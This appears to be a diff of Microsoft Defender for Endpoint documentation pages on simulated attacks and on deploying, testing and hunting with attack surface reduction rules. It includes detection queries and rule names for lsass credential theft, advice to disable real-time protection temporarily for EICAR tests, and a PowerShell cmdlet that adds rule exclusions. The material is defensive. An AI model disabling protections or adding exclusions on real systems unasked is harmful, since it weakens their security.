-> - Users with full access (users that are assigned the Global Administrator or Security Administrator directory role in Microsoft Entra ID), are automatically assigned the default Defender for Endpoint administrator role, which also has full access. Additional Microsoft Entra user groups can be assigned to the Defender for Endpoint administrator role after switching to RBAC. Only users assigned to the Defender for Endpoint administrator role can manage permissions using RBAC.
-> - Users that have read-only access (Security Readers) will lose access to the portal until they are assigned a role. Note that only Microsoft Entra user groups can be assigned a role under RBAC.
-> - After switching to RBAC, you will not be able to switch back to using basic permissions management.
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## Related topics
--- [Use basic permissions to access the portal](basic-permissions.md)-- [Manage portal access using RBAC](rbac.md)
security Attack Simulations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-simulations.md
- Title: Experience Microsoft Defender for Endpoint through simulated attacks
-description: Run the provided attack scenario simulations to experience how Microsoft Defender for Endpoint can detect, investigate, and respond to breaches.
--------- m365-security-- tier2- Previously updated : 04/09/2024--
-# Experience Microsoft Defender for Endpoint through simulated attacks
-
-> [!IMPORTANT]
-> **The Microsoft Defender for Endpoint evaluation lab was deprecated in January, 2024**.
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-attacksimulations-abovefoldlink)
-
-> [!TIP]
->
-> - Learn about the latest enhancements in Microsoft Defender for Endpoint: [What's new in Defender for Endpoint?](https://cloudblogs.microsoft.com/microsoftsecure/2018/11/15/whats-new-in-windows-defender-atp/).
-> - Defender for Endpoint demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation. Read: [Insights from the MITRE ATT&CK-based evaluation](https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/insights-from-the-mitre-attack-based-evaluation-of-windows-defender-atp/).
-
-You might want to experience Defender for Endpoint before you onboard more than a few devices to the service. To do this, you can run controlled attack simulations on a few test devices. After running the simulated attacks, you can review how Defender for Endpoint surfaces malicious activity and explore how it enables an efficient response.
-
-## Before you begin
-
-To run any of the provided simulations, you need at least [one onboarded device](onboard-configure.md).
-
-Read the walkthrough document provided with each attack scenario. Each document includes OS and application requirements as well as detailed instructions that are specific to an attack scenario.
-
-## Run a simulation
-
-1. In **Endpoints** \> **Evaluation & tutorials** \> **Tutorials & simulations**, select which of the available attack scenarios you would like to simulate:
- - **Scenario 1: Document drops backdoor** - simulates delivery of a socially engineered lure document. The document launches a specially crafted backdoor that gives attackers control.
- - **Scenario 2: PowerShell script in fileless attack** - simulates a fileless attack that relies on PowerShell, showcasing attack surface reduction and device learning detection of malicious memory activity.
- - **Scenario 3: Automated incident response** - triggers automated investigation, which automatically hunts for and remediates breach artifacts to scale your incident response capacity.
-
-2. Download and read the corresponding walkthrough document provided with your selected scenario.
-
-3. Download the simulation file or copy the simulation script by navigating to **Evaluation & tutorials** \> **Tutorials & simulations**. You can choose to download the file or script on the test device but it's not mandatory.
-
-4. Run the simulation file or script on the test device as instructed in the walkthrough document.
-
-> [!NOTE]
-> Simulation files or scripts mimic attack activity but are actually benign and will not harm or compromise the test device.
->
-> You can also use the EICAR test file or the EICAR test text string to perform some tests. It is possible to test real-time protection features (create a text file, paste the EICAR text, and save the file as an executable file to your endpoint's local driveΓÇöyou will get a notification on the test endpoint and an alert in the MDE console) or EDR protection (you need to temporarily disable real-time protection on the test endpoint and save the EICAR test file, and then try to execute, copy, or move this file). After you run your tests, enable real-time protection on the test endpoint.
->
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-attacksimulations-belowfoldlink)
-
-## Related topics
--- [Onboard devices](onboard-configure.md)-- [Onboard Windows devices](configure-endpoints.md)
security Attack Surface Reduction Rules Deployment Implement https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-implement.md
- Title: Implement attack surface reduction rules
-description: Provides guidance to implement your attack surface reduction rules deployment.
--------- Previously updated : 12/19/2022--
-# Implement attack surface reduction rules
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Implementing attack surface reduction rules move the first test ring into an enabled, functional state.
-
-> :::image type="content" source="media/asr-rules-implementation-steps.png" alt-text="The procedure to implement attack surface reduction rules" lightbox="media/asr-rules-implementation-steps.png":::
-
-
-## Step 1: Transition attack surface reduction rules from Audit to Block
-
-1. After all exclusions are determined while in audit mode, start setting some attack surface reduction rules to "block" mode, starting with the rule that has the fewest triggered events. See [Enable attack surface reduction rules](enable-attack-surface-reduction.md).
-2. Review the reporting page in the Microsoft Defender portal; see [Threat protection report in Microsoft Defender for Endpoint](threat-protection-reports.md). Also review feedback from your champions.
-3. Refine exclusions or create new exclusions as determined necessary.
-4. Switch problematic rules back to Audit.
-
- > [!NOTE]
- > For problematic rules (rules creating too much noise), it is better to create exclusions than to turn rules off or switching back to Audit. You will have to determine what is best for your environment.
-
- > [!TIP]
- > When available, take advantage of the Warn mode setting in rules to limit disruptions. Enabling attack surface reduction rules in Warn mode enables you to capture triggered events and view their potential disruptions, without actually blocking end-user access. Learn more: [Warn mode for users](attack-surface-reduction.md#warn-mode-for-users).
-
-### How does Warn mode work?
-
-Warn mode is effectively a Block instruction, but with the option for the user to "Unblock" subsequent executions of the given flow or app. Warn mode unblocks on a per device, user, file, and process combination. The warn mode information is stored locally and has a duration of 24 hours.
-
-### Step 2: Expand deployment to ring n + 1
-
-When you're confident that you've correctly configured the attack surface reduction rules for ring 1, you can widen the scope of your deployment to the next ring (ring n + 1).
-
-The deployment process, steps 1 ΓÇô 3, is essentially the same for each subsequent ring:
-
-1. Test rules in Audit
-2. Review attack surface reduction-triggered audit events in the Microsoft Defender portal
-3. Create exclusions
-4. Review: refine, add, or remove exclusions as necessary
-5. Set rules to "block"
-6. Review the reporting page in the Microsoft Defender portal.
-7. Create exclusions.
-8. Disable problematic rules or switch them back to Audit.
-
-#### Customize attack surface reduction rules
-
-As you continue to expand your attack surface reduction rules deployment, you may find it necessary or beneficial to customize the attack surface reduction rules that you've enabled.
-
-##### Exclude files and folders
-
-You can choose to exclude files and folders from being evaluated by attack surface reduction rules. When excluded, the file isn't blocked from running even if an attack surface reduction rule detects that the file contains malicious behavior.
-
-For example, consider the ransomware rule:
-
-The ransomware rule is designed to help enterprise customers reduce risks of ransomware attacks while ensuring business continuity. By default, the ransomware rule errors on the side of caution and protect against files that haven't yet attained sufficient reputation and trust. To reemphasize, the ransomware rule only triggers on files that haven't gained enough positive reputation and prevalence, based on usage metrics of millions of our customers. Usually, the blocks are self resolved, because each file's "reputation and trust" values are incrementally upgraded as non-problematic usage increases.
-
-In cases in which blocks aren't self resolved in a timely manner, customers can - _at their own risk_ - make use of either the self-service mechanism or an Indicator of Compromise (IOC)-based "allowlist" capability to unblock the files themselves.
-
-> [!WARNING]
-> Excluding or unblocking files or folders could potentially allow unsafe files to run and infect your devices. Excluding files or folders can severely reduce the protection provided by attack surface reduction rules. Files that would have been blocked by a rule will be allowed to run, and there will be no report or event recorded.
-
-An exclusion can apply to all rules that allow exclusions or apply to specific rules using [per-rule exclusions](attack-surface-reduction-rules-deployment-test.md#configure-attack-surface-reduction-per-rule-exclusions). You can specify an individual file, folder path, or the fully qualified domain name for a resource.
-
-An exclusion is applied only when the excluded application or service starts. For example, if you add an exclusion for an update service that is already running, the update service continues to trigger events until the service is stopped and restarted.
-
-Attack surface reduction supports environment variables and wildcards. For information about using wildcards, see [use wildcards in the file name and folder path or extension exclusion lists](configure-extension-file-exclusions-microsoft-defender-antivirus.md#use-wildcards-in-the-file-name-and-folder-path-or-extension-exclusion-lists).
-If you're encountering problems with rules detecting files that you believe shouldn't be detected, [use audit mode to test the rule](evaluate-attack-surface-reduction.md).
-
-See the [attack surface reduction rules reference](attack-surface-reduction-rules-reference.md) article for details on each rule.
-
-##### Use Group Policy to exclude files and folders
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](https://technet.microsoft.com/library/cc731212.aspx). Right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. In the **Group Policy Management Editor**, go to **Computer configuration** and select **Administrative templates**.
-
-3. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Microsoft Defender Exploit Guard** \> **Attack surface reduction**.
-
-4. Double-click the **Exclude files and paths from Attack surface reduction Rules** setting and set the option to **Enabled**. Select **Show** and enter each file or folder in the **Value name** column. Enter **0** in the **Value** column for each item.
-
-> [!WARNING]
-> Do not use quotes as they are not supported for either the **Value name** column or the **Value** column.
-
-##### Use PowerShell to exclude files and folders
-
-1. Type **powershell** in the Start menu, right-click **Windows PowerShell** and select **Run as administrator**.
-
-2. Enter the following cmdlet:
-
- ```PowerShell
- Add-MpPreference -AttackSurfaceReductionOnlyExclusions "<fully qualified path or resource>"
- ```
-
- Continue to use `Add-MpPreference -AttackSurfaceReductionOnlyExclusions` to add more folders to the list.
-
- > [!IMPORTANT]
- > Use `Add-MpPreference` to append or add apps to the list. Using the `Set-MpPreference` cmdlet will overwrite the existing list.
-
-##### Use MDM CSPs to exclude files and folders
-
-Use the [./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions](/windows/client-management/mdm/policy-csp-defender#defender-attacksurfacereductiononlyexclusions) configuration service provider (CSP) to add exclusions.
-
-##### Customize the notification
-
-You can customize the notification for when a rule is triggered and blocks an app or file. See the [Windows Security](/windows/security/threat-protection/windows-defender-security-center/windows-defender-security-center#customize-notifications-from-the-windows-defender-security-center) article.
-
-## Additional articles in this deployment collection
-
-[Attack surface reduction rules deployment overview](attack-surface-reduction-rules-deployment.md)
-
-[Plan attack surface reduction rules deployment](attack-surface-reduction-rules-deployment-plan.md)
-
-[Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md)
-
-[Operationalize attack surface reduction rules](attack-surface-reduction-rules-deployment-operationalize.md)
-
-[Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
-
-## See also
--- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Attack Surface Reduction Rules Deployment Operationalize https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-operationalize.md
- Title: Operationalize attack surface reduction rules
-description: Provides guidance to operationalize your attack surface reduction rules deployment.
--------- Previously updated : 08/29/2023--
-# Operationalize attack surface reduction rules
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-After you've fully deployed attack surface reduction rules, it's vital that you have processes in place to monitor and respond to ASR-related activities. Activities include:
-
-## Managing ASR rules false positives
-
-False positives/negatives can occur with any threat protection solution. False positives are cases in which an entity (such as a file or process) is detected and identified as malicious, although the entity isn't actually a threat. In contrast, a false negative is an entity that wasn't detected as a threat but is malicious. For more information about false positives and false negatives, see: [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)
-
-## Keeping up with ASR rules reports
-
-Consistent, regular review of reports is an essential aspect of maintaining your attack surface reduction rules deployment and keeping abreast of newly emerging threats. Your organization should have scheduled reviews of attack surface reduction rules events on a cadence that keeps current with attack surface reduction rules-reported events. Depending on the size of your organization, reviews might be daily, hourly, or continuous monitoring.
-
-## ASR rules Advanced Hunting
-
-One of the most powerful features of [Microsoft Defender XDR](https://security.microsoft.com) is advanced hunting. If you're not familiar with advanced hunting, see: [Proactively hunt for threats with advanced hunting](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-overview).
-
-> :::image type="content" source="media/asr-defender365-advanced-hunting2.png" alt-text="The Advanced Hunting page in the Microsoft Defender portal. Microsoft Defender for Endpoint attack surface reduction rules used in advanced hunting" lightbox="media/asr-defender365-advanced-hunting2.png":::
-
-Advanced hunting is a query-based (Kusto Query Language) threat-hunting tool that lets you explore up to 30 days of the captured data. Through advanced hunting, you can proactively inspect events in order to locate interesting indicators and entities. The flexible access to data facilitates unconstrained hunting for both known and potential threats.
-
-Through advanced hunting, it's possible to extract attack surface reduction rules information, create reports, and get in-depth information on the context of a given attack surface reduction rule audit or block event.
-
- You can query attack surface reduction rule events from the DeviceEvents table in the advanced hunting section of the Microsoft Defender portal. For example, the following query shows how to report all the events that have attack surface reduction rules as data source, for the last 30 days. The query then summarizes by the ActionType count with the name of the attack surface reduction rule.
-
-Attack surface reduction events shown in the advancing hunting portal are throttled to unique processes seen every hour. The time of the attack surface reduction event is the first time the event is seen within that hour.
-
-```kusto
-DeviceEvents
-| where Timestamp > ago(30d)
-| where ActionType startswith "Asr"
-| summarize EventCount=count() by ActionType
-```
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/asr-defender365-advanced-hunting4.png" alt-text="The Advanced hunting query results in the Microsoft Defender portal" lightbox="media/asr-defender365-advanced-hunting4.png":::
-
-The above shows that 187 events were registered for AsrLsassCredentialTheft:
--- 102 for Blocked-- 85 for Audited-- Two events for AsrOfficeChildProcess (1 for Audited and 1 for Block)-- Eight events for AsrPsexecWmiChildProcessAudited-
-If you want to focus on the AsrOfficeChildProcess rule and get details on the actual files and processes involved, change the filter for ActionType and replace the summarize line with a projection of the wanted fields (in this case they're DeviceName, FileName, FolderPath, etc.).
-
-```kusto
-DeviceEvents
-| where (Actiontype startswith "AsrOfficechild")
-| extend RuleId=extractjson("$Ruleid", AdditionalFields, typeof(string))
-| project DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
-```
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/asr-defender365-advanced-hunting5b.png" alt-text="The Advanced hunting query focused results in the Microsoft Defender portal" lightbox="media/asr-defender365-advanced-hunting5b.png":::
-
-The true benefit of advanced hunting is that you can shape the queries to your liking. By shaping your query you can see the exact story of what was happening, regardless of whether you want to pinpoint something on an individual machine, or you want to extract insights from your entire environment.
-
-For more information about hunting options, see: [Demystifying attack surface reduction rules - Part 3](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/demystifying-attack-surface-reduction-rules-part-3/ba-p/1360968).
-
-## Articles in this deployment collection
-
-[Attack surface reduction rules deployment overview](attack-surface-reduction-rules-deployment.md)
-
-[Plan attack surface reduction rules deployment](attack-surface-reduction-rules-deployment-plan.md)
-
-[Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md)
-
-[Enable attack surface reduction rules](attack-surface-reduction-rules-deployment-implement.md)
-
-[Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
security Attack Surface Reduction Rules Deployment Plan https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-plan.md
- Title: Plan attack surface reduction rules deployment
-description: Provides guidance to plan your attack surface reduction rules deployment.
--------- Previously updated : 12/18/2022--
-# Plan attack surface reduction rules deployment
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Before you test or enable attack surface reduction rules, you should plan your deployment. Careful planning helps you test your attack surface reduction rules deployment and get ahead of any rule exceptions. When planning to test attack surface reduction rules, make sure you start with the right business unit. Start with a small group of people in a specific business unit. You can identify some champions within a particular business unit who can provide feedback to help tune your implementation.
-
-> :::image type="content" source="media/asr-rules-planning-steps.png" alt-text="The attack surface reduction rules planning steps." lightbox="media/asr-rules-planning-steps.png":::
-
-> [!IMPORTANT]
->
-> While you're going through the process of planning, auditing, and enable attack surface reduction rules, it's recommended that you enable the following three _standard protection rules_. See [Attack surface reduction rules by type](attack-surface-reduction-rules-reference.md#attack-surface-reduction-rules-by-type) for important details about the two types of attack surface reduction rules.
->
-> - [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](attack-surface-reduction-rules-reference.md#block-credential-stealing-from-the-windows-local-security-authority-subsystem)
-> - [Block abuse of exploited vulnerable signed drivers](attack-surface-reduction-rules-reference.md#block-abuse-of-exploited-vulnerable-signed-drivers)
-> - [Block persistence through Windows Management Instrumentation (WMI) event subscription](attack-surface-reduction-rules-reference.md#block-persistence-through-wmi-event-subscription)
->
-> You can typically enable the standard protection rules with minimal noticeable impact to the end user. For an easy method to enable the standard protection rules, see: [Simplified standard protection option](attack-surface-reduction-rules-report.md#simplified-standard-protection-option).
-
-## Start your ASR rules deployment with the right business unit
-
-How you select the business unit to roll out your attack surface reduction rules deployment depends on factors such as:
--- Size of business unit-- Availability of attack surface reduction rules champions -- Distribution and usage of:
- - Software
- - Shared folders
- - Use of scripts
- - Office macros
- - Other entities affected by attack surface reduction rules
-
-Depending on your business needs, you might decide to include multiple business units to get a broad sampling of software, shared folders, scripts, macros, etc. You might decide to limit the scope of your first attack surface reduction rules rollout to a single business unit. Then, repeat the entire attack surface reduction rules rollout process to your other business units, one-at-a-time.
-
-## Identify ASR rules champions
-
-Attack surface reduction rules champions are members in your organization who can help with your initial attack surface reduction rules rollout during the preliminary testing and implementation phases. Your champions are typically employees who are more technically adept, and who aren't derailed by intermittent work-flow outages. The champions' involvement continues throughout the broader expansion of attack surface reduction rules deployment to your organization. Your attack surface reduction rules champions are first to experience each level of the attack surface reduction rules rollout.
-
-It's important to provide a feedback and response channel for your attack surface reduction rules champions to alert you to attack surface reduction rules-related work disruptions and receive attack surface reduction rules-rollout related communications.
-
-## Get inventory of line-of-business apps and understand the business unit processes
-
-Having a full understanding of the applications and per-business-unit processes that are used across your organization is critical to a successful attack surface reduction rules deployment. Additionally, it's imperative that you understand how those apps are used within the various business units in your organization.
-To start, you should get an inventory of the apps that are approved for use across the breadth of the organization. You can use tools such as the Microsoft 365 Apps admin center to help inventory software applications. See: [Overview of inventory in the Microsoft 365 Apps admin center](/deployoffice/admincenter/inventory).
-
-## Define reporting and response ASR rules team roles and responsibilities
-
-Clearly articulating roles and responsibilities of persons responsible for monitoring and communicating attack surface reduction rules status and activity is a core activity of attack surface reduction maintenance. Therefore, it's important to determine:
--- The person or team responsible for gathering reports-- How and with whom reports are shared-- How escalation is addressed for newly identified threats or unwanted blockages caused by attack surface reduction rules-
-Typical roles and responsibilities include:
--- IT admins: Implement attack surface reduction rules, manage exclusions. Work with different business units on apps and processes. Assembling and sharing reports to stakeholders-- Certified security operations center (CSOC) analyst: Responsible for investigating high-priority, blocked processes, to determine whether the threat is valid or not-- Chief information security officer (CISO): Responsible for the overall security posture and health of the organization-
-## ASR rules ring deployment
-
-For large enterprises, Microsoft recommends deploying attack surface reduction rules in "rings." Rings are groups of devices that are visually represented as concentric circles that radiate outward like nonoverlapping tree rings. When the innermost ring is successfully deployed, you can transition to the next ring into the testing phase. Thorough assessment of your business units, attack surface reduction rules champions, apps, and processes is imperative to defining your rings.
-In most cases, your organization has deployment rings for phased rollouts of Windows updates. You can use your existing ring design to implement attack surface reduction rules.
-See: [Create a deployment plan for Windows](/windows/deployment/update/create-deployment-plan)
-
-## Other articles in this deployment collection
-
-[Attack surface reduction rules deployment overview](attack-surface-reduction-rules-deployment.md)
-
-[Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md)
-
-[Enable attack surface reduction rules](attack-surface-reduction-rules-deployment-implement.md)
-
-[Operationalize attack surface reduction rules](attack-surface-reduction-rules-deployment-operationalize.md)
-
-[Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
security Attack Surface Reduction Rules Deployment Test https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-test.md
- Title: Test attack surface reduction rules
-description: Learn how to test attack surface reduction rules in Defender for Endpoint.
--------- Previously updated : 08/14/2023--
-# Test attack surface reduction rules
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Testing Microsoft Defender for Endpoint attack surface reduction rules helps you determine if rules impede line-of-business operations prior to enabling any rule. By starting with a small, controlled group, you can limit potential work disruptions as you expand your deployment across your organization.
-
-In this section of the attack surface reduction rules deployment guide, you'll learn how to:
--- configure rules using Microsoft Intune-- use Microsoft Defender for Endpoint attack surface reduction rules reports-- configure attack surface reduction rules exclusions-- enable attack surface reduction rules using PowerShell-- use Event Viewer for attack surface reduction rules events-
-> [!NOTE]
-> Before you begin testing attack surface reduction rules, it is recommended that you first disable all rules that you have previously set to either **audit** or **enable** (if applicable). See [Attack surface reduction rules reports](attack-surface-reduction-rules-report.md) for information about using the attack surface reduction rules report to disable attack surface reduction rules.
-
-Begin your attack surface reduction rules deployment with ring 1.
-
-> :::image type="content" source="media/asr-rules-testing-steps.png" alt-text="The Microsoft Defender for Endpoint attack surface reduction (ASR rules) test steps. Audit attack surface reduction rules, configure ASR rules exclusions. Configure ASR rules Intune. ASR rules exclusions. ASR rules event viewer." lightbox="media/asr-rules-testing-steps.png":::
-
-## Step 1: Test attack surface reduction rules using Audit
-
-Begin the testing phase by turning on the attack surface reduction rules with the rules set to Audit, starting with your champion users or devices in ring 1. Typically, the recommendation is that you enable all the rules (in Audit) so that you can determine which rules are triggered during the testing phase. Rules that are set to Audit don't generally impact functionality of the entity or entities to which the rule is applied but do generate logged events for the evaluation; there is no effect on end users.
-
-### Configure attack surface reduction rules using Intune
-
-You can use Microsoft Intune Endpoint Security to configure custom attack surface reduction rules.
-
-1. Open the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431).
-2. Go to **Endpoint Security** > **Attack surface reduction**.
-3. Select **Create Policy**.
-4. In **Platform**, select **Windows 10, Windows 11, and Windows Server**, and in **Profile**, select **Attack surface reduction rules**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/asr-mem-create-profile.png" alt-text="The profile creation page for ASR rules" lightbox="media/asr-mem-create-profile.png":::
-
-5. Select **Create**.
-6. In the **Basics** tab of the **Create profile** pane, in **Name** add a name for your policy. In **Description** add a description for your attack surface reduction rules policy.
-7. In the **Configuration settings** tab, under **Attack Surface Reduction Rules**, set all rules to **Audit mode**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/asr-mem-configuration-settings.png" alt-text="The configuration of attack surface reduction rules to Audit mode" lightbox="media/asr-mem-configuration-settings.png":::
-
- > [!NOTE]
- > There are variations in some attack surface reduction rules mode listings; _Blocked_ and _Enabled_ provide the same functionality.
-
-8. [Optional] In the **Scope tags** pane, you can add tag information to specific devices. You can also use role-based access control and scope tags to make sure that the right admins have the right access and visibility to the right Intune objects. Learn more: [Use role-based access control (RBAC) and scope tags for distributed IT in Intune](/mem/intune/fundamentals/scope-tags).
-9. In the **Assignments** pane, you can deploy or "assign" the profile to your user or device groups. Learn more: [Assign device profiles in Microsoft Intune](/mem/intune/configuration/device-profile-assign#exclude-groups-from-a-profile-assignment)
-
- > [!NOTE]
- > Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-10. Review your settings in the **Review + create** pane. Click **Create** to apply the rules.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/asr-mem-review-create.png" alt-text="The Create profile page" lightbox="media/asr-mem-review-create.png":::
-
-Your new attack surface reduction policy for attack surface reduction rules is listed in **Endpoint security | Attack surface reduction**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/asr-mem-my-asr-rules.png" alt-text=" The Attack surface reduction page" lightbox="media/asr-mem-my-asr-rules.png":::
-
-<a name='step-2-understand-the-asr-rules-reporting-page-in-the-microsoft-365-defender-portal'></a>
-
-## Step 2: Understand the attack surface reduction rules reporting page in the Microsoft Defender portal
-
-The attack surface reduction rules reporting page is found in **Microsoft Defender portal** > **Reports** > **Attack surface reduction rules**. This page has three tabs:
--- Detections-- Configuration-- Add exclusions-
-### Detections tab
-
-Provides a 30-day timeline of detected audit and blocked events.
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/attack-surface-reduction-rules-report-main-detections-card.png" alt-text="Graph that shows the attack surface reduction rules report summary detections card." lightbox="media/attack-surface-reduction-rules-report-main-detections-card.png":::
-
-The attack surface reduction rules pane provides an overview of detected events on a per-rule basis.
-
-> [!NOTE]
-> There are some variations in attack surface reduction rules reports. Microsoft is in the process of updating the behavior of the attack surface reduction rules reports to provide a consistent experience.
--
-Select **View detections** to open the **Detections** tab.
-
->:::image type="content" source="media/attack-surface-reduction-rules-report-main-tabs-search.png" alt-text="Screenshot that shows the attack surface reduction rules report search feature." lightbox="media/attack-surface-reduction-rules-report-main-tabs-search.png":::
-
-The **GroupBy** and **Filter** pane provide the following options:
-
-The **GroupBy** returns results set to the following groups:
--- No grouping-- Detected file-- Audit or block-- Rule-- Source app-- Device-- User-- Publisher-
-> [!NOTE]
-> When filtering by rule, the number of individual _detected_ items listed in the lower half of the report is currently limited to 200 rules. You can use **Export** to save the full list of detections to Excel.
--
-**Filter** opens the **Filter on rules** page, which enables you to scope the results to only the selected attack surface reduction rules:
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/asr-defender365-filter.png" alt-text="The Attack surface reduction rules detections filter on rules" lightbox="media/asr-defender365-filter.png":::
-
-> [!NOTE]
-> If you have a Microsoft Microsoft 365 Security E5 or A5, Windows E5 or A5 license, the following link opens the Microsoft Defender 365 Reports > [Attack surface reductions](https://security.microsoft.com/asr?viewid=detections) > Detections tab.
-
-### Configuration tab
-
-ListsΓÇöon a per-computer basisΓÇöthe aggregate state of attack surface reduction rules: Off, Audit, Block.
-
->:::image type="content" source="media/attack-surface-reduction-rules-report-main-configuration-tab.png" alt-text="Screenshot that shows the attack surface reduction rules report main configuration tab." lightbox="media/attack-surface-reduction-rules-report-main-configuration-tab.png":::
-
-On the Configurations tab, you can check, on a per-device basis, which attack surface reduction rules are enabled, and in which mode, by selecting the device for which you want to review attack surface reduction rules.
-
->:::image type="content" source="media/attack-surface-reduction-rules-report-configuration-add-to-policy.png" alt-text="Screenshot that shows the ASR rules fly-out to add ASR rules to devices." lightbox="media/attack-surface-reduction-rules-report-configuration-add-to-policy.png":::
-
-The **Get started** link opens the Microsoft Intune admin center, where you can create or modify an endpoint protection policy for attack surface reduction:
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/asr-defender365-05b-mem1.png" alt-text="The *Endpoint security menu item on the Overview page" lightbox="media/asr-defender365-05b-mem1.png":::
-
-In Endpoint security | Overview, select **Attack surface reduction**:
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/asr-defender365-05b-mem2.png" alt-text="The Attack surface reduction in Intune" lightbox="media/asr-defender365-05b-mem2.png":::
-
-The Endpoint Security | Attack surface reduction pane opens:
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/asr-defender365-05b-mem3.png" alt-text="The Endpoint security Attack surface reduction pane" lightbox="media/asr-defender365-05b-mem3.png":::
-
-> [!NOTE]
-> If you have a Microsoft Defender 365 E5 (or Windows E5?) license, this link will open the Microsoft Defender 365 Reports > Attack surface reductions > [Configurations](https://security.microsoft.com/asr?viewid=configuration) tab.
-
-### Add exclusions
-
-This tab provides a method to select detected entities (for example, false positives) for exclusion. When exclusions are added, the report provides a summary of the expected impact.
-
-> [!NOTE]
-> Microsoft Defender Antivirus AV exclusions are honored by attack surface reduction rules. See [Configure and validate exclusions based on extension, name, or location](configure-extension-file-exclusions-microsoft-defender-antivirus.md).
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/asr-defender365-06d.png" alt-text="The pane for exclusion of the detected file" lightbox="media/asr-defender365-06d.png":::
-
-> [!NOTE]
-> If you have a Microsoft Defender 365 E5 (or Windows E5?) license, this link will open the Microsoft Defender 365 Reports > Attack surface reductions > [Exclusions](https://security.microsoft.com/asr?viewid=exclusions) tab.
-
-For more information about using the attack surface reduction rules report, see [Attack surface reduction rules reports](attack-surface-reduction-rules-report.md).
-
-## Configure attack surface reduction per-rule exclusions
-
-Attack surface reduction rules now provide the capability to configure rule-specific exclusions, known as "Per Rule Exclusions."
-
-> [!NOTE]
-> Per-rule exclusions cannot currently be configured by using PowerShell or Group Policy.
-
-To configure specific rule exclusions:
-
-1. Open the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), and navigate to **Home** > **Endpoint security** > **Attack surface reduction**.
-
-2. If it isn't already configured, set the rule for which you want to configure exclusions to **Audit** or **Block**.
-
-3. In **ASR Only Per Rule Exclusion**, click the toggle to change from **Not configured** to **Configured.**
-
-4. Enter the names of the files or application that you want to exclude.
-
-5. At the bottom of the **Create profile** wizard, select **Next** and follow the wizard instructions.
-
->:::image type="content" source="media/attack-surface-reduction-rules-report-per-rule-exclusion.png" alt-text="Screenshot that shows the configuration settings for adding ASR per-rule exclusions." lightbox="media/attack-surface-reduction-rules-report-per-rule-exclusion.png":::
-
-> [!TIP]
-> Use the checkboxes next to your list of exclusion entries to select items to **Delete**, **Sort**, **Import**, or **Export**.
-
-### Use PowerShell as an alternative method to enable attack surface reduction rules
-
